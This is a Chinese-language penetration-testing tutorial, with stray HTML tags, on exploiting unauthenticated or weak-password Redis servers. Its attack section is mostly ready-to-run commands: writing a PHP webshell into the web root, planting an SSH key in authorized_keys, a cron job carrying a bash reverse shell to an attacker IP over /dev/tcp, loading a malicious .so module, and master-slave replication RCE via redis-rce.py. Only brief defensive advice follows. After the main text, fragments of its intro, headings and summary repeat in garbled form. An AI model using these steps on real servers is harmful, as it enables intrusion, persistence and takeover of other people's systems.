Redis数据库在渗透测试中的利用方法<\/h1>

前言<\/h2>
本文主要讲解在Redis数据库存在未授权访问或弱口令漏洞时的多种利用方式，包括写入Webshell、写入SSH公钥、计划任务反弹Shell、模块加载执行命令以及主从复制RCE等技术。<\/p>

环境准备<\/h2>

测试环境<\/h3>

Redis服务器<\/strong>：<\/p>

操作系统：Ubuntu 20.04 LTS<\/li>
数据库：Redis<\/li>
Web容器：Apache 2.4.41<\/li>
脚本语言：PHP 7.4.3<\/li> <\/ul> <\/li>

攻击机<\/strong>：<\/p>

Kali Linux rolling 2020.2<\/li> <\/ul> <\/li> <\/ul>
Redis数据库安装<\/h3>

下载Redis：从Redis官网<\/a>获取<\/li>
安装步骤：
tar -zxvf redis-4.0.0.tar.gz <\/span><\/span>cd redis-4.0.0\/ <\/span><\/span>sudo make <\/span><\/span>cd src <\/span><\/span>sudo make install <\/span><\/span><\/code><\/pre><\/li>
修改配置文件redis.conf<\/code>：

将bind 127.0.0.1<\/code>改为服务器IP地址<\/li>
设置daemonize yes<\/code>使Redis作为后台进程运行<\/li> <\/ul> <\/li>
启动Redis：
redis-server redis-4.0.0\/redis.conf <\/span><\/span><\/code><\/pre><\/li> <\/ol>
Web环境安装<\/h3>

安装Apache：
sudo apt install apache2 <\/span><\/span>service apache2 status <\/span><\/span><\/code><\/pre><\/li> 安装PHP： sudo apt install php libapache2-mod-php <\/span><\/span>php -v <\/span><\/span><\/code><\/pre><\/li> 测试PHP解析： cd \/var\/www\/ <\/span><\/span>sudo chmod 777<\/span> html\/ <\/span><\/span>cd html\/ <\/span><\/span>echo '<?php phpinfo();'<\/span> > 1.php <\/span><\/span><\/code><\/pre><\/li> <\/ol> 连接方式<\/h2> 1. redis-cli<\/h3> sudo apt install redis <\/span><\/span>redis-cli -h host -p port -a password <\/span><\/span>info <\/span><\/span><\/code><\/pre>2. Redis Desktop Manager<\/h3> 图形化界面工具，可执行Redis命令。<\/p> 3. 蚁剑Redis数据库插件<\/h3> 安装：蚁剑→插件市场→Redis管理<\/li> 使用：需要先有一个Webshell，通过插件连接Redis<\/li> <\/ol> 利用方式<\/h2> 1. 写入Webshell<\/h3> 必要条件<\/strong>：<\/p> 知道网站绝对路径<\/li> 拥有网站目录写入权限<\/li> <\/ul> 操作步骤<\/strong>：<\/p> keys * # 查看所有键<\/span> <\/span><\/span>set x "\n<?php phpinfo();?>\n"<\/span> # 创建键并赋值<\/span> <\/span><\/span>config get * # 查看配置<\/span> <\/span><\/span>config set dir \/var\/www\/html # 设置写入目录<\/span> <\/span><\/span>config set dbfilename shell.php # 设置文件名<\/span> <\/span><\/span>save # 保存写入<\/span> <\/span><\/span>del x # 删除创建的键<\/span> <\/span><\/span># 还原配置<\/span> <\/span><\/span>config set dir \/原目录 <\/span><\/span>config set dbfilename dump.rdb <\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p> 不同工具写入\n<\/code>的效果不同，redis-cli能正确解析为换行<\/li> 写入会覆盖原有文件内容<\/li> <\/ul> 2. 写入SSH公钥<\/h3> 必要条件<\/strong>：<\/p> 知道启动服务的用户<\/li> 拥有.ssh<\/code>目录<\/li> 允许基于密钥认证登录<\/li> <\/ul> 生成密钥方法<\/strong>：<\/p> 使用ssh-keygen：<\/p> ssh-keygen -t rsa <\/span><\/span><\/code><\/pre>在公钥内容前后添加换行符<\/p> <\/li> 使用Xshell生成密钥<\/p> <\/li> <\/ol> 操作步骤<\/strong>：<\/p> set x "\n\n公钥内容\n\n"<\/span> # 创建键并赋值<\/span> <\/span><\/span>config set dir \/home\/user\/.ssh # 设置.ssh目录<\/span> <\/span><\/span>config set dbfilename authorized_keys # 设置文件名<\/span> <\/span><\/span>save <\/span><\/span>del x <\/span><\/span># 还原配置<\/span> <\/span><\/span><\/code><\/pre>连接方法<\/strong>：<\/p> ssh -i 私钥 user@ip <\/span><\/span><\/code><\/pre>3. 计划任务反弹Shell<\/h3> 必要条件<\/strong>：<\/p> 拥有计划任务目录写权限<\/li> 目标启动计划服务<\/li> <\/ul> 操作步骤<\/strong>：<\/p> set x "\n\n* * * * * bash -i >& \/dev\/tcp\/攻击IP\/端口 0>&1\n\n"<\/span> <\/span><\/span>config set dir \/var\/spool\/cron <\/span><\/span>config set dbfilename root <\/span><\/span>save <\/span><\/span>del x <\/span><\/span># 还原配置<\/span> <\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p> CentOS可行，Ubuntu因计划任务不允许脏数据而不可行<\/li> 需要nc监听：nc -lvp 端口<\/code><\/li> <\/ul> 4. 模块加载执行命令<\/h3> 必要条件<\/strong>：<\/p> 目标服务器上有.so文件<\/li> Redis支持module命令(Redis 4.0+)<\/li> <\/ul> 操作步骤<\/strong>：<\/p> 上传恶意.so文件<\/li> 加载模块执行命令： module load \/tmp\/exp.so <\/span><\/span>system.exec "whoami"<\/span> <\/span><\/span>module list <\/span><\/span>module unload system <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 主从复制RCE<\/h3> 必要条件<\/strong>：<\/p> Redis版本 ≥ 4.x<\/li> <\/ul> 利用工具<\/strong>：<\/p> redis-rce.py<\/a><\/li> <\/ul> 操作步骤<\/strong>：<\/p> python redis-rce.py -L 本地IP -r 目标IP -f exp.so <\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p> 攻击机设置为主节点<\/li> 目标Redis为从节点<\/li> 通过全量复制将.so文件写入目标<\/li> 加载.so文件执行命令<\/li> <\/ol> 防御建议<\/h2> 设置强密码认证<\/li> 以低权限用户运行Redis<\/li> 限制外网访问，设置IP白名单<\/li> 定期更新Redis版本<\/li> <\/ol> 总结<\/h2> Ubuntu无法通过计划任务利用<\/li> 所有写入操作都是覆盖操作，需谨慎<\/li> 根据环境选择合适的连接和利用方式<\/li> 模块加载和主从复制需要Redis 4.0+版本<\/li> 不同工具对特殊字符(如\n<\/code>)处理方式不同<\/li> <\/ol>

Redis数据库在渗透测试中的利用方法<\/h1>

前言<\/h2> 本文主要讲解在Redis数据库存在未授权访问或弱口令漏洞时的多种利用方式，包括写入Webshell、写入SSH公钥、计划任务反弹Shell、模块加载执行命令以及主从复制RCE等技术。<\/p>

环境准备<\/h2>

连接方式<\/h2>

2. Redis Desktop Manager<\/h3> 图形化界面工具，可执行Redis命令。<\/p>

利用方式<\/h2>

总结<\/h2> Ubuntu无法通过计划任务利用<\/li> 所有写入操作都是覆盖操作，需谨慎<\/li> 根据环境选择合适的连接和利用方式<\/li> 模块加载和主从复制需要Redis 4.0+版本<\/li> 不同工具对特殊字符(如\n<\/code>)处理方式不同<\/li> <\/ol>

前言<\/h2>
本文主要讲解在Redis数据库存在未授权访问或弱口令漏洞时的多种利用方式，包括写入Webshell、写入SSH公钥、计划任务反弹Shell、模块加载执行命令以及主从复制RCE等技术。<\/p>

2. Redis Desktop Manager<\/h3>
图形化界面工具，可执行Redis命令。<\/p>

总结<\/h2>

Ubuntu无法通过计划任务利用<\/li>
所有写入操作都是覆盖操作，需谨慎<\/li>
根据环境选择合适的连接和利用方式<\/li>
模块加载和主从复制需要Redis 4.0+版本<\/li>
不同工具对特殊字符(如`\n<\/code>)处理方式不同<\/li> <\/ol>`